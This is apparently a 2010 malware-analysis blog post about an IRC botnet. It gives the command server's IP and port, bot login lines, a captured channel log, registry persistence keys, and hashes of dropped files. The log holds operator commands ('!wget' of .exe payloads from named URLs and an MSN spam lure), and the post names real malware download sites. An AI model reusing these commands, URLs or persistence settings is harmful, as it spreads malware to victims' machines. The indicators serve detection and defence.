195.162.68.118(botnet hosted with Russian Federation Navitel Rusconnect Ltd)

By Pig, December 16, 2010

Remote Host Port Number
195.162.68.118 7777 PASS google_x1[s7_4]rk-h.tmp

NICK {N}|USA|XP|COMPUTERNAME|192671
USER vsqcdz “” “lfjx” :COMPUTERNAME
JOIN #nonamefase
PRIVMSG #nonamefase :New Servant.

Now talking in #nonamefase
Modes On: [ #nonamefase ] [ +smntu ]
(niname) !wget http://www.rummagu.com/burnbuddy.exe
(niname) !wget http://shoponline.muji.fr/images/sss.exe
(niname) !wget http://www.rummagu.com/burnbuddy.exe
(niname) !!wget http://www.rummagu.com/burnbuddy.exe
(niname) !!wget http://www.rummagu.com/burnbuddy.exe
(niname) !wget http://www.rummagu.com/burnbuddy.exe
(niname) !msn Boot your pc now – http://www.zestbyte.com/pc-boost.exe
(niname) !wget http://www.rummagu.com/burnbuddy.exe
Quits: niname [no@anyfuck.I] (Ping timeout)
niname sets mode: +oaq niname niname niname

Registry Modifications

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Windows Live Guards = “%ProgramFiles%winlogon.exe”
+ UserFaultCheck = “%System%dumprep 0 -u”

so that winlogon.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
+ Windows Live Guards = “%ProgramFiles%winlogon.exe”

so that winlogon.exe runs every time Windows starts

* Notes:
o %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:Documents and Settings[UserName]Application Data.
o %ProgramFiles% is a variable that refers to the Program Files folder. A typical path is C:Program Files.

* The following directories were created:
o c:My Downloads
o %ProgramFiles%KAZAA

File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash
1 %AppData%google_x1[s7_4]rk-h.tmp 9 bytes MD5: 0x6C936CB4A4B7F5803BD2E3DEACC3C2FE
SHA-1: 0x561782F6CC10BA3E5AFEAED752F95E589C813891
2 %AppData%google__x1[s7_4]rk-h.tmp 9 bytes MD5: 0x1F4BBF969C0CDB4D145F47D3184D06D0
SHA-1: 0x66E3E41B2CD86E83D1F65484EC249F30F1C68046
3 %AppData%phqghumeaylnlfdxfirc.exe 499,712 bytes MD5: 0x2332F2058880E9B243794F1AF146B87F
SHA-1: 0x860AD161531187027AE7FC8A66C7E6D1CA12A865
4 %ProgramFiles%winlogon.exe
[file and pathname of the sample #1] 102,400 bytes MD5: 0x806F308FE25491495A5158239D9D47D3
SHA-1: 0x7F3DC2936A31AA34D32AD37B11C9A6F9E60C6FC5

infos about hosting:
http://whois.domaintools.com/195.162.68.118

Categories: Uncategorized